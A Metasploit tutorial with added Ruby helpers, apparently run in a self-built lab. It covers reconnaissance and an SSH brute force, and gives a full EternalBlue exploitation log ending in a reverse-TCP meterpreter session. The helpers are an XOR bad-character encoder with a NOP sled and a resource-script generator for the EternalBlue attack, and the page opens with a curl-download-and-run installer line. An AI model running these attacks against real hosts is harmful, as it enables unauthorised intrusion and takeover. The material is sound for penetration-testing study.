Using Metasploit:

Installation:

On a typical Linux distribution MSF is not installed by default. The following installs the MSF framework on a non-Kali Linux.

One-line install:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

adduser msf                          # add an msf user
su msf                               # switch to the msf user
cd /opt/metasploit-framework/bin     # go to the msf directory
./msfconsole                         # from now on start msfconsole as the msf user so the database is connected; started as root it will not be

Read msfinstall before executing it: it runs with root privileges and installs packages, so a script fetched from the network deserves a look before it gets that.

You can also put msfconsole on the PATH so it can be started from any directory:
ln -s /opt/metasploit-framework/bin/msfconsole /usr/bin/msfconsole

# Note:
# The first run of msf creates the database, but the PostgreSQL database msf uses by default is not associated with the root user, which is why a separate msf user is created to run Metasploit. If your first run was accidentally as root, run msfdb reinit and then initialise the database as a non-root user.

1. Architecture:

[image: Metasploit module architecture diagram]

auxiliary: auxiliary modules

Metasploit provides a large number of auxiliary modules for the information-gathering phase of a penetration test: scanning and enumeration of all kinds of network services, fake services that capture login credentials, password guessing and cracking, sniffing for sensitive data, probing for information leaks, fuzzing to find vulnerabilities, network protocol spoofing, and more.
Auxiliary modules let the tester collect rich intelligence on the target before launching an exploit.

encoders: encoder modules

Once a payload module and a NOP module have been assembled into an instruction sequence, and before the exploit module places that sequence in the malicious data buffer handed to the target, the framework performs one more important step: encoding.

  • Ensure the payload contains none of the "bad characters" the exploit must avoid (bytes the vulnerable input path would truncate or mangle, typically 0x00, 0x0a and 0x0d for C strings and line-based protocols).
  • "AV evasion" of the payload. Encoders exist for the first purpose; their decoder stubs (shikata_ga_nai included) are well known to AV engines, so encoding alone should not be expected to evade a current product.

evasion: evasion modules

Modules whose purpose is generating payloads meant to get past AV; a separate module type from encoders.

exploits: exploit modules

An exploit module is the code component that attacks a target system through a discovered vulnerability or configuration weakness in order to plant and run a payload and thereby gain access to the remote system.

Active exploitation targets vulnerabilities in server-side network software and the applications those services host. Because such services listen on a port and wait for client connections, the attack can be initiated by the attacker: connect to the service, send specially crafted requests carrying the malicious data, trigger the vulnerability, and have the remote service process execute the payload embedded in that data, yielding a control session on the target.

Passive (client-side) exploitation targets vulnerabilities in client software: browsers and browser plugins, mail clients, Office, Adobe and other document readers and editors. Data cannot be pushed into such software from the outside, so the attacker instead crafts a malicious web page, e-mail or document and gets it in front of the user: by hosting it on a server, sending it as an attachment, distributing it with social engineering, or combining it with network spoofing and hijacking. When a user on the target system opens the content, the client-side vulnerability fires and hands back a shell session.

nops: NOP modules

A NOP (no-operation) is an instruction that has no meaningful effect on program state; the canonical one on x86 is NOP, opcode 0x90.

Their role is "padding": a sled of NOPs placed in front of the payload means that control landing anywhere in the sled slides forward into the payload, which relaxes how precisely the exploit must know the payload's address.

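The two jobs described above for encoders and NOP modules, as an added example that is not Metasploit's own encoder code: a single-byte XOR encoder that searches for a key under which no encoded byte (and not the key itself, since it has to travel with the decoder) lands in the bad-character set, with an x86 NOP sled in front. SAMPLE_PAYLOAD is constructed filler, not real shellcode, and BAD_CHARS is the usual set for C-string and line-based inputs; both are assumptions for the demonstration.

```ruby
# Added example, not Metasploit's encoder code. Bad characters are bytes the
# vulnerable input path would truncate or mangle; the encoder's contract is
# that neither the encoded payload nor the decoder bytes contain any of them.
BAD_CHARS = [0x00, 0x0a, 0x0d].freeze
# Constructed sample bytes (not shellcode). Raw, they contain 0x00, 0x0a and 0x0d.
SAMPLE_PAYLOAD = "\x31\xc0\x50\x68\x00\x0a\x2f\x73\x68\x89\xe3\x0d\x0b".b.freeze

def contains_bad_chars?(blob, bad_chars = BAD_CHARS)
  blob.each_byte.any? { |b| bad_chars.include?(b) }
end

# First key in 1..255 that is itself clean and makes every payload byte clean.
# Returns nil when no single-byte key works (a longer key or another encoder
# is then needed), which is the failure case an encoder has to report.
def find_xor_key(payload, bad_chars = BAD_CHARS)
  (1..255).find do |key|
    next false if bad_chars.include?(key)
    payload.each_byte.none? { |b| bad_chars.include?(b ^ key) }
  end
end

def xor_bytes(data, key)
  data.each_byte.map { |b| b ^ key }.pack("C*")
end

# Layout: [NOP sled][key byte][encoded payload]. A real encoder embeds the key
# in a decoder stub; keeping it as a bare byte is enough to show that the
# stub's bytes are subject to the same bad-char rule as the payload.
def encode_with_sled(payload, bad_chars = BAD_CHARS, sled_len: 16)
  key = find_xor_key(payload, bad_chars)
  raise "no single-byte XOR key avoids #{bad_chars.inspect}" unless key
  sled = "\x90".b * sled_len                       # x86 NOP, opcode 0x90
  { key: key, blob: sled + [key].pack("C") + xor_bytes(payload, key), sled_len: sled_len }
end

# What the decoder stub does at run time: skip the sled, read the key, undo the XOR.
def decode_blob(blob, sled_len)
  body = blob.byteslice(sled_len..)
  xor_bytes(body.byteslice(1..), body.getbyte(0))
end

if __FILE__ == $0
  r = encode_with_sled(SAMPLE_PAYLOAD)
  puts format("raw payload has bad chars: %s", contains_bad_chars?(SAMPLE_PAYLOAD))
  puts format("key=0x%02x  blob has bad chars: %s  round-trip ok: %s",
              r[:key], contains_bad_chars?(r[:blob]),
              decode_blob(r[:blob], r[:sled_len]) == SAMPLE_PAYLOAD)
end
```

The key search is the part that matters: key 0x01 is rejected here because 0x0b ^ 0x01 = 0x0a, so the encoder settles on 0x02. Real MSF encoders solve the same constraint with multi-byte keys and a polymorphic decoder stub, which is what makes the output differ per run, not what makes it invisible to AV.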
payloads: payload modules

A payload is the code that the target runs after a successful exploit; typically it opens a control session for the attacker on the target system.

In MSF the payload name also specifies the session transport, e.g. a reverse TCP connection back to the attacker.

post: post-exploitation modules

Post modules support the many actions that follow gaining access to or control of a target: harvesting sensitive information, extending the foothold, pivoting to further hosts, and so on.

2. Command quick reference

Command          Description
msfconsole       Start MSF in console mode
exit             Exit the msf console; inside a session, exit the session
use              Select a module
info             Show detailed information about the module
set              Configure a module option
show options     Show the module's configurable options
run / exploit    Launch the module
search           Search by keyword; filters include type:auxiliary, path:telnet, cve:2018-7600
show targets     Show the target types the module applies to
show payloads    Show the payloads compatible with the module
background       Put the current session in the background
sessions -i      Session management / interact with a session

Examples of the search command:

search ms17-010

search bluekeep

search CVE:2018-7600

search type:auxiliary path:telnet

Basic usage:

  • Start the framework: msfconsole
  • Enter a module with use: use exploit/windows/smb/ms17_010_eternalblue
  • Show module information: info
  • Set the payload: set payload windows/x64/meterpreter/reverse_tcp
  • Show the options the module needs with show options, then set them, e.g. set rhosts 10.1.1.4
  • Attack: exploit or run
  • Post-exploitation

The steps differ from attack to attack; they are not fixed and need to be applied flexibly.

The commands can also be written into a resource file such as configure.rc (any file ending in .rc) and run automatically with msfconsole -r configure.rc.
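As an added example (not from this page and not part of Metasploit), the following Ruby script writes the resource file for the steps above and lints an rc file before it is handed to msfconsole. The module, payload and addresses are the ones used on this page; KNOWN_CMDS is an assumed, deliberately short list of console commands, enough to catch a mistyped command name.

```ruby
# Added example, not from the page or from Metasploit itself: generate the
# resource script for the workflow above and lint one before running it with
#   msfconsole -q -r eternalblue.rc
require "ipaddr"

# Module and payload names are slash-separated lowercase path components.
MODULE_NAME_RE = /\A[a-z0-9_]+(\/[a-z0-9_]+)+\z/

def valid_addr?(str)
  IPAddr.new(str)            # accepts "10.1.1.4" and "10.1.1.0/24"
  true
rescue IPAddr::Error, ArgumentError
  false
end

# Build the rc text. Fail here, not later inside msfconsole with a half-run script.
def build_rc(exploit:, payload:, rhosts:, lhost:, lport: 4444)
  raise ArgumentError, "bad module name: #{exploit}" unless exploit.match?(MODULE_NAME_RE)
  raise ArgumentError, "bad payload name: #{payload}" unless payload.match?(MODULE_NAME_RE)
  raise ArgumentError, "bad RHOSTS: #{rhosts}" unless valid_addr?(rhosts)
  raise ArgumentError, "bad LHOST: #{lhost}" unless valid_addr?(lhost) && !lhost.include?("/")
  raise ArgumentError, "bad LPORT: #{lport}" unless lport.is_a?(Integer) && lport.between?(1, 65_535)

  [
    "use #{exploit}",
    "set PAYLOAD #{payload}",
    "set RHOSTS #{rhosts}",
    "set LHOST #{lhost}",
    "set LPORT #{lport}",
    "check",              # the module's own vulnerability check, prints its verdict first
    "exploit -j -z",      # run as a background job and do not auto-interact
    "sessions -l",        # list whatever came back
  ].join("\n") + "\n"
end

# Assumed, intentionally short list of console commands used by the linter.
KNOWN_CMDS = %w[use set setg unset check run exploit sessions sleep back info show search].freeze

# Lint an rc file: returns the module, the options it sets, and every line
# that is neither a comment nor a known command, so a typo such as "sett"
# or "exploti" is caught before the run instead of aborting it midway.
def parse_rc(text)
  result = { module: nil, options: {}, unknown: [] }
  text.each_line do |raw|
    line = raw.strip
    next if line.empty? || line.start_with?("#")
    cmd, *args = line.split
    case cmd
    when "use"         then result[:module] = args.first
    when "set", "setg" then result[:options][args[0].upcase] = args[1..].join(" ")
    else result[:unknown] << line unless KNOWN_CMDS.include?(cmd)
    end
  end
  result
end

if __FILE__ == $0
  rc = build_rc(exploit: "exploit/windows/smb/ms17_010_eternalblue",
                payload: "windows/x64/meterpreter/reverse_tcp",
                rhosts: "10.1.1.4", lhost: "10.1.1.99")
  puts rc
  p parse_rc(rc)
end
```

Save the printed text as eternalblue.rc and run msfconsole -q -r eternalblue.rc. Since RHOSTS accepts a CIDR range, the same script covers a whole subnet, which is exactly why the check line is kept before the exploit.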

3. Information gathering

Host discovery and port scanning:

Metasploit provides auxiliary modules for host discovery under

auxiliary/scanner/discovery/*

Listing that directory:

[image: listing of the auxiliary/scanner/discovery modules]

shows the modules above.

arp_sweep enumerates the live hosts on the local LAN. It works at the ARP level, so it only finds hosts on the directly attached segment, but on that segment it is not affected by host firewalls that drop ICMP.

Enter the module with:

use auxiliary/scanner/discovery/arp_sweep

then show options to see which parameters need setting:

msf6 auxiliary(scanner/discovery/arp_sweep) > set Rhosts 192.168.189.0/24
Rhosts => 192.168.189.0/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set threads 50
threads => 50
msf6 auxiliary(scanner/discovery/arp_sweep) > run

[+] 192.168.189.1 appears to be up (VMware, Inc.).
[+] 192.168.189.2 appears to be up (VMware, Inc.).
[+] 192.168.189.254 appears to be up (VMware, Inc.).
[+] 192.168.189.138 appears to be up (VMware, Inc.).
[+] 192.168.189.139 appears to be up (VMware, Inc.).
[+] 192.168.189.142 appears to be up (VMware, Inc.).
[+] 192.168.189.254 appears to be up (VMware, Inc.).
[+] 192.168.189.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

The target range, the thread count and so on can be set.

Still, nmap is the better tool for this; once the number of hosts goes up you will understand why nmap is called the king of scanners.

The following modules perform port scanning:

auxiliary/scanner/portscan/*

Directory contents:

└─# tree /usr/share/metasploit-framework/modules/auxiliary/scanner/portscan 
/usr/share/metasploit-framework/modules/auxiliary/scanner/portscan
├── ack.rb
├── ftpbounce.rb
├── syn.rb
├── tcp.rb
└── xmas.rb

Of these, syn is the usual recommendation: it sends a SYN and never completes the handshake, so the target application never sees a connection (it needs raw sockets, i.e. root). That is the only sense in which it is "less noticeable"; a firewall or IDS sees the SYNs all the same.

It is also slow; nmap, the king of scanners, is far faster.

Fingerprinting service versions:

System commands can be run from inside metasploit, so nmap can be used directly to get detailed service information on the target (-A turns on version detection, default scripts, OS detection and traceroute; -p- scans all TCP ports; -Pn skips host discovery):

msf6 auxiliary(scanner/portscan/syn) > nmap -A -p- -sS -sC -T4 -Pn 192.168.189.139
[*] exec: nmap -A -p- -sS -sC -T4 -Pn 192.168.189.139

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-29 20:07 CST
Nmap scan report for 192.168.189.139
Host is up (0.00100s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 36985/tcp status
| 100024 1 42276/udp6 status
| 100024 1 50121/tcp6 status
|_ 100024 1 58573/udp status
36985/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:84:E2:7E (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.00 ms 192.168.189.139

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.04 seconds

Service enumeration:

Metasploit's auxiliary modules include many service scanning and enumeration tools, usually named in the style ssh_version. Such a module walks the network for hosts running a given service and then identifies the service version.

SSH enumeration:

Administrators usually manage servers over SSH, and the server hands the SSH client a remote shell. Without further hardening, obtaining the login password is enough to log in with an SSH client, which is equivalent to obtaining every privilege of that user. The ssh_version module enumerates the hosts on the network with SSH open:

msf6 > search ssh_version

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/fuzzers/ssh/ssh_version_15 normal No SSH 1.5 Version Fuzzer
1 auxiliary/fuzzers/ssh/ssh_version_2 normal No SSH 2.0 Version Fuzzer
2 auxiliary/fuzzers/ssh/ssh_version_corrupt normal No SSH Version Corruption
3 auxiliary/scanner/ssh/ssh_version normal No SSH Version Scanner


Interact with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/ssh/ssh_version

The ssh_login module can also brute-force users (though its speed is, frankly, a concern):

msf6 auxiliary(scanner/ssh/ssh_login) > run

[*] 192.168.189.139:22 - Starting bruteforce
[-] 192.168.189.139:22 - Failed: 'flag4:flag4'
[!] No active DB -- Credential data will not be saved!
[-] 192.168.189.139:22 - Failed: 'flag4:'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment: This list has been compiled by Solar Designer of Openwall Project'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment: in 1996 through 2011. It is assumed to be in the public domain.'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment:'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment: This list is based on passwords most commonly seen on a set of Unix'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment: systems in mid-1990's, sorted for decreasing number of occurrences'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment: (that is, more common passwords are listed first). It has been'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment: revised to also include common website passwords from public lists'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment: of "top N passwords" from major community website compromises that'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment: occurred in 2006 through 2010.'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment:'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment: Last update: 2011/11/20 (3546 entries)'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment:'
[-] 192.168.189.139:22 - Failed: 'flag4:#!comment: For more wordlists, see https://www.openwall.com/wordlists/'
[-] 192.168.189.139:22 - Failed: 'flag4:123456'
[-] 192.168.189.139:22 - Failed: 'flag4:12345'
[-] 192.168.189.139:22 - Failed: 'flag4:password'
[-] 192.168.189.139:22 - Failed: 'flag4:password1'
[-] 192.168.189.139:22 - Failed: 'flag4:123456789'
[-] 192.168.189.139:22 - Failed: 'flag4:12345
.................
..................
...................
..................
One more remark: hydra is the better tool for this!!!
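The run above shows a detail worth fixing regardless of which tool is used: the module tried the "#!comment:" header lines of the Openwall password list as passwords, wasting attempts and, against a host with lockout or fail2ban, burning through the budget early. As an added example (not from the page), this Ruby snippet cleans a wordlist of that format and builds the "user password" pairs for the module's USERPASS_FILE option; SAMPLE_LIST is a constructed list in the Openwall layout, and the usernames are assumptions.

```ruby
# Added example, not from the page or from Metasploit: prepare a wordlist for
# ssh_login so that no comment or blank line is ever sent as a password.

# Constructed sample in the Openwall list format (header comments, blanks, a duplicate).
SAMPLE_LIST = <<~LIST
  #!comment: This list has been compiled by Solar Designer of Openwall Project
  #!comment:
  123456
  12345
  password

  password1
  123456
  P@ssw0rd!
LIST

# Drop comment lines, blank lines and duplicates, keeping order so the most
# common passwords stay first. min_len lets you skip guesses a known password
# policy on the target would never have accepted.
def clean_wordlist(text, min_len: 1)
  seen = {}
  text.each_line.filter_map do |raw|
    pw = raw.chomp
    next if pw.empty? || pw.start_with?("#!comment:")
    next if pw.length < min_len
    next if seen[pw]
    seen[pw] = true
    pw
  end
end

# "user password" per line for USERPASS_FILE; the line count is the number of
# login attempts, which is what has to fit under the target's lockout policy.
def userpass_lines(users, passwords)
  users.product(passwords).map { |u, p| "#{u} #{p}" }
end

if __FILE__ == $0
  pws = clean_wordlist(SAMPLE_LIST)
  pairs = userpass_lines(%w[flag4 admin], pws)   # assumed usernames
  puts pws
  puts "#{pairs.size} attempts planned"
end
```

Write the pairs to a file and point the module at it with set USERPASS_FILE, together with set STOP_ON_SUCCESS true so it stops hammering an account once a password works; BRUTEFORCE_SPEED (0 to 5) throttles the rate.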

The dir_scanner module can also scan web directories (same remark: the speed is a concern; use a dedicated tool for real work):

msf6 auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.189.139
[+] Found http://192.168.189.139:80/.../ 403 (192.168.189.139)
[+] Found http://192.168.189.139:80/.CVS/ 403 (192.168.189.139)
[+] Found http://192.168.189.139:80/0/ 200 (192.168.189.139)
[+] Found http://192.168.189.139:80/Admin/ 403 (192.168.189.139)
[+] Found http://192.168.189.139:80/USER/ 200 (192.168.189.139)
[+] Found http://192.168.189.139:80/abc/ 403 (192.168.189.139)
[+] Found http://192.168.189.139:80/admin/ 403 (192.168.189.139)
[+] Found http://192.168.189.139:80/batch/ 403 (192.168.189.139)
[+] Found http://192.168.189.139:80/cgi-bin/ 403 (192.168.189.139)

........
...........
..........
......

4. Active exploitation

Example 1: the classic EternalBlue attack (port 445)

msf6 > search ms17_010

0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 \_ target: Automatic Target . . . .
2 \_ target: Windows 7 . . . .
3 \_ target: Windows Embedded Standard 7 . . . .
4 \_ target: Windows Server 2008 R2 . . . .
5 \_ target: Windows 8 . . . .
6 \_ target: Windows 8.1 . . . .
7 \_ target: Windows Server 2012 . . . .
8 \_ target: Windows 10 Pro . . . .
9 \_ target: Windows 10 Enterprise Evaluation . . . .
10 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
11 \_ target: Automatic . . . .
12 \_ target: PowerShell . . . .
13 \_ target: Native upload . . . .
14 \_ target: MOF upload . . . .
15 \_ AKA: ETERNALSYNERGY . . . .
16 \_ AKA: ETERNALROMANCE . . . .
17 \_ AKA: ETERNALCHAMPION . . . .
18 \_ AKA: ETERNALBLUE . . . .
19 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
20 \_ AKA: ETERNALSYNERGY . . . .
21 \_ AKA: ETERNALROMANCE . . . .
22 \_ AKA: ETERNALCHAMPION . . . .
23 \_ AKA: ETERNALBLUE . . . .
24 auxiliary/scanner/smb/smb_ms17_010 . normal No MS17-010 SMB RCE Detection
25 \_ AKA: DOUBLEPULSAR . . . .
26 \_ AKA: ETERNALBLUE . . . .


Interact with a module by name or index. For example info 26, use 26 or use auxiliary/scanner/smb/smb_ms17_010

Among these, auxiliary/scanner/smb/smb_ms17_010 is the module that scans the internal network for hosts vulnerable to EternalBlue.

I built a local virtual LAN containing only a Windows 7 machine and Kali and scanned it:

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.1.1.0/24
rhosts => 10.1.1.0/24
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[-] 10.1.1.0:445 - Rex::HostUnreachable: The host (10.1.1.0:445) was unreachable.
[-] 10.1.1.1:445 - Rex::HostUnreachable: The host (10.1.1.1:445) was unreachable.
[-] 10.1.1.2:445 - Rex::HostUnreachable: The host (10.1.1.2:445) was unreachable.
[-] 10.1.1.3:445 - Rex::HostUnreachable: The host (10.1.1.3:445) was unreachable.
[+] 10.1.1.4:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[-] 10.1.1.5:445 - Rex::HostUnreachable: The host (10.1.1.5:445) was unreachable.
[-] 10.1.1.6:445 - Rex::HostUnreachable: The host (10.1.1.6:445) was unreachable.
[-] 10.1.1.7:445 - Rex::HostUnreachable: The host (10.1.1.7:445) was unreachable.
[-] 10.1.1.8:445 - Rex::HostUnreachable: The host (10.1.1.8:445) was unreachable.
[-] 10.1.1.9:445 - Rex::HostUnreachable: The host (10.1.1.9:445) was unreachable.

A + line means the scan found a host that is probably vulnerable to EternalBlue.
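The console output of arp_sweep earlier and of smb_ms17_010 here is what you work from when the range is larger than a lab /24, so here is an added example (not from the page, not Metasploit code) that turns both into structured data: a de-duplicated list of live hosts with vendor (arp_sweep printed 192.168.189.254 three times above) and the hosts flagged as likely vulnerable with the OS string, ready to paste into set RHOSTS. SAMPLE_OUTPUT is constructed from the page's own runs.

```ruby
# Added example, not from the page or from Metasploit: parse the console
# output of arp_sweep and smb_ms17_010 into de-duplicated host lists.

ARP_LINE  = /\A\[\+\]\s+(\d+\.\d+\.\d+\.\d+)\s+appears to be up\s+\((.+)\)\.?\z/
MS17_LINE = /\A\[\+\]\s+(\d+\.\d+\.\d+\.\d+):445 - Host is likely VULNERABLE to MS17-010! - (.+)\z/

# Constructed from the runs shown on the page (duplicate .254 line kept on purpose).
SAMPLE_OUTPUT = <<~OUT
  [+] 192.168.189.1 appears to be up (VMware, Inc.).
  [+] 192.168.189.254 appears to be up (VMware, Inc.).
  [+] 192.168.189.139 appears to be up (VMware, Inc.).
  [+] 192.168.189.254 appears to be up (VMware, Inc.).
  [*] Scanned 256 of 256 hosts (100% complete)
  [-] 10.1.1.3:445 - Rex::HostUnreachable: The host (10.1.1.3:445) was unreachable.
  [+] 10.1.1.4:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
  [*] Auxiliary module execution completed
OUT

# Returns { up: {ip => vendor}, ms17_010: {ip => os string}, unreachable: count }.
def parse_scan(text)
  r = { up: {}, ms17_010: {}, unreachable: 0 }
  text.each_line(chomp: true) do |line|
    if (m = ARP_LINE.match(line))
      r[:up][m[1]] ||= m[2]               # hash key de-duplicates repeated replies
    elsif (m = MS17_LINE.match(line))
      r[:ms17_010][m[1]] = m[2]
    elsif line.include?("Rex::HostUnreachable")
      r[:unreachable] += 1
    end
  end
  r
end

# Space-separated, sorted by octet value rather than as strings, for "set RHOSTS".
def rhosts_value(ips)
  ips.sort_by { |ip| ip.split(".").map(&:to_i) }.join(" ")
end

if __FILE__ == $0
  r = parse_scan(SAMPLE_OUTPUT)
  puts "up:         #{rhosts_value(r[:up].keys)}"
  puts "ms17-010:   #{r[:ms17_010].inspect}"
  puts "unreachable: #{r[:unreachable]}"
end
```

Inside msfconsole the same output is available via spool to write it to a file; the scanner's verdict is "likely", so the exploit module's own check (run automatically, as the next listing shows) remains the deciding test.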

Next, the EternalBlue exploit module is used directly against that IP:

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.1.1.4
rhosts => 10.1.1.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.1.1.99
lhost => 10.1.1.99
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.1.1.99:4444
[*] 10.1.1.4:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.1.1.4:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.1.1.4:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.1.1.4:445 - The target is vulnerable.
[*] 10.1.1.4:445 - Connecting to target for exploitation.
[+] 10.1.1.4:445 - Connection established for exploitation.
[+] 10.1.1.4:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.1.1.4:445 - CORE raw buffer dump (42 bytes)
[*] 10.1.1.4:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.1.1.4:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.1.1.4:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.1.1.4:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.1.1.4:445 - Trying exploit with 12 Groom Allocations.
[*] 10.1.1.4:445 - Sending all but last fragment of exploit packet
[*] 10.1.1.4:445 - Starting non-paged pool grooming
[+] 10.1.1.4:445 - Sending SMBv2 buffers
[+] 10.1.1.4:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.1.1.4:445 - Sending final SMBv2 buffers.
[*] 10.1.1.4:445 - Sending last fragment of exploit packet!
[*] 10.1.1.4:445 - Receiving response from exploit packet
[+] 10.1.1.4:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.1.1.4:445 - Sending egg to corrupted connection.
[*] 10.1.1.4:445 - Triggering free of corrupted buffer.
[-] 10.1.1.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.1.1.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.1.1.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.1.1.4:445 - Connecting to target for exploitation.
[+] 10.1.1.4:445 - Connection established for exploitation.
[+] 10.1.1.4:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.1.1.4:445 - CORE raw buffer dump (42 bytes)
[*] 10.1.1.4:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.1.1.4:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.1.1.4:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.1.1.4:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.1.1.4:445 - Trying exploit with 17 Groom Allocations.
[*] 10.1.1.4:445 - Sending all but last fragment of exploit packet
[*] 10.1.1.4:445 - Starting non-paged pool grooming
[+] 10.1.1.4:445 - Sending SMBv2 buffers
[+] 10.1.1.4:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.1.1.4:445 - Sending final SMBv2 buffers.
[*] 10.1.1.4:445 - Sending last fragment of exploit packet!
[*] 10.1.1.4:445 - Receiving response from exploit packet
[+] 10.1.1.4:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.1.1.4:445 - Sending egg to corrupted connection.
[*] 10.1.1.4:445 - Triggering free of corrupted buffer.
[*] Sending stage (201798 bytes) to 10.1.1.4
[*] Meterpreter session 1 opened (10.1.1.99:4444 -> 10.1.1.4:49359) at 2024-07-29 21:02:05 +0800
[+] 10.1.1.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.1.1.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.1.1.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

A meterpreter prompt means the attack succeeded!! The log shows that it did not succeed on the first try: it made two attempts (12 and then 17 groom allocations), which matches the module's own description of the exploit as unreliable. Failed kernel pool grooming can also crash the target, so against a production host expect a possible blue screen rather than a clean retry.

Typing shell then gives a window similar to cmd on Windows. (Type chcp 65001 to temporarily fix garbled output.)

Example 2: CVE-2018-7600 (DC-1, web)

First, search CVE:2018-7600 to see whether there is an exploit module for this CVE:

Search result:
msf6 > search CVE:2018-7600

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/drupal_drupalgeddon2

Once found, use 0 enters the module and info shows its details.

That is not shown here; show options lists the parameters that need configuring:

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options

